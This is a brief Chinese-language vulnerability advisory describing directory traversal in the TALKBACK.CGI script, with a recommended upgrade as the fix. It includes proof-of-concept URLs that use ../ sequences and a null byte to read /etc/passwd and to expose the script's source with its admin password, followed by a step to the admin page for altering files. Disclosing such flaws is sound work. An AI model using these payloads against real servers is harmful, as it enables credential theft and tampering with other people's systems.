TALKBACK.CGI 泄露系统信息漏洞
/ns/ld/softld/data/20010414060339.htm
涉及程序:
TALKBACK.CGI
描述:
构造特殊的 URL 导致 TALKBACK.CGI 目录遍历漏洞
详细:
发现 TALKBACK.CGI 脚本存在漏洞,攻击者通过构造特殊的 URL 能浏览受影响系统中的任何文件。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1
能显示 /etc/passwd(如果 WEBSERVER 对该文件有访问权)
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1
这将显示包含管理员密码的 TALKBACK.CGI 源代码。
利用上面得到的信息,攻击者能删改文件:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin
受影响系统:
运行 TALKBACK.CGI 脚本的 UNIX 系统
--------------------------------------------------------------------------------
解决办法:
建议您下载安装 TALKBACK 升级版本:
http://www.waytotheweb.com/webscripts/talkback.htm